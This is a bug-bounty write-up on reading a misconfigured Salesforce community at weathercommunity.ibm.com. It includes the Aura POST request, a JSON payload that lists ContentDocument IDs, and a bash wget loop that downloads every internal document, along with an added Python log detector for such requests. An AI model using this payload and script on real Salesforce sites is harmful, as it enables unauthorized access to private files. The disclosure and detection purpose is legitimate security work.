Hi, today I will share how I was able to access internal data of https://weathercommunity.ibm.com using a Salesforce misconfiguration.
This write-up depends on this great blog: Salesforce
so please read it first and then read this write-up.
After I read that blog, I wanted to exploit it in the wild, so I looked for subdomains that point to one of the following CNAMEs:
*.force.com
*.secure.force.com
*live.siteforce.com
I used this great tool https://github.com/yghonem14/cngo to get the CNAMEs of all the websites that have a program on HackerOne, through https://chaos.projectdiscovery.io/
I found this subdomain, weathercommunity.ibm.com, which points to: thercommunity.ibm.com.00de0000000avgcma2.live.siteforce.com
I found an endpoint like:
POST /s/sfsites/aura?r=2&applauncher.CommunityLogo.getCommunityName=1&applauncher.CommunityLogo.getLogoURL=1&applauncher.EmployeeLoginLink.getEmployeeLoginUrl=1&applauncher.EmployeeLoginLink.getIsAllowInternalUserLoginEnabled=1&applauncher.SocialLogin.getAuthProviders=1&applauncher.SocialLogin.getSamlProviders=1&applauncher.SocialLogin.handleIdp=1&other.LightningLoginForm.getForgotPasswordUrl=1&other.LightningLoginForm.getIsSelfRegistrationEnabled=1&other.LightningLoginForm.getIsUsernamePasswordEnabled=1&other.LightningLoginForm.getSelfRegistrationUrl=1&ui-communities-components-aura-components-forceCommunity-richText.RichText.getParsedRichTextValue=2&ui-communities-components-aura-components-forceCommunity-seoAssistant.SeoAssistant.getSeoLanguageData=1 HTTP/1.1
Then I sent this POST request to Repeater and changed the message parameter value to:
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"MARKER","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}
replacing the MARKER string with: ContentDocument
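For the defending side, the request shape above is easy to spot in web-server or WAF logs: a guest-session POST to the Aura endpoint whose message parameter carries a SelectableListDataProvider getItems action against ContentDocument. The check below is an added example written for this write-up, not code from the original post or from Salesforce; the request records it scans are constructed, and the WATCHED_OBJECTS set is an assumption you would extend with whatever sObjects your community should never expose to guests.

```python
"""Flag Aura requests that list ContentDocument records via the
SelectableListDataProvider getItems action described in the write-up."""
import json
from urllib.parse import parse_qs, urlencode

AURA_PATH = "/s/sfsites/aura"
GETITEMS_DESCRIPTOR = (
    "serviceComponent://ui.force.components.controllers.lists."
    "selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems"
)
WATCHED_OBJECTS = {"ContentDocument"}  # assumption: add other sensitive sObjects here


def getitems_entities(path: str, body: str):
    """Return [(entityNameOrId, pageSize), ...] for every getItems action found in
    the URL-encoded form body of an Aura request; [] for anything else."""
    if path.split("?", 1)[0] != AURA_PATH:
        return []
    found = []
    for message in parse_qs(body).get("message", []):
        try:
            actions = json.loads(message).get("actions", [])
        except (ValueError, AttributeError):  # not JSON, or not an object
            continue
        for action in actions:
            if action.get("descriptor") == GETITEMS_DESCRIPTOR:
                params = action.get("params", {})
                found.append((params.get("entityNameOrId"), params.get("pageSize")))
    return found


def scan(requests):
    """Yield (path, entity, pageSize) for listings of watched objects."""
    return [(path, entity, size) for path, body in requests
            for entity, size in getitems_entities(path, body)
            if entity in WATCHED_OBJECTS]


def _aura_body(entity):
    """Constructed request body in the shape shown in the write-up."""
    msg = {"actions": [{"id": "123;a", "descriptor": GETITEMS_DESCRIPTOR,
                        "callingDescriptor": "UNKNOWN",
                        "params": {"entityNameOrId": entity, "layoutType": "FULL",
                                   "pageSize": 100, "currentPage": 0}}]}
    return urlencode({"message": json.dumps(msg), "aura.context": "{}"})


SAMPLE_REQUESTS = [  # constructed guest-session records: (path, form body)
    ("/s/sfsites/aura?r=2&other.LightningLoginForm.getForgotPasswordUrl=1",
     _aura_body("ContentDocument")),
    ("/s/sfsites/aura?r=1", _aura_body("Knowledge__kav")),  # not watched here
    ("/s/login", "username=guest"),
]

if __name__ == "__main__":
    for path, entity, size in scan(SAMPLE_REQUESTS):
        print(f"ALERT guest listing of {entity} (pageSize={size}) via {path}")
```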
See that there are more than 900 IDs. I extracted the ID values that start with 069 and wrote a simple bash script to download them one by one through this endpoint: /sfc/servlet.shepherd/document/download/$ID
https://weathercommunity.ibm.com/sfc/servlet.shepherd/document/download/ID
Example:
https://weathercommunity.ibm.com/sfc/servlet.shepherd/document/download/0690h0000060wuHAAQ
#!/bin/bash
# Reads one document ID per line from the file given as the first argument
# and fetches each document through the shepherd download endpoint.
while read -r id; do
  wget --no-check-certificate "https://weathercommunity.ibm.com/sfc/servlet.shepherd/document/download/$id"
done < "$1"
Sample of the internal images:
Reporting:
Twitter:
twitter.com/mohamed12742780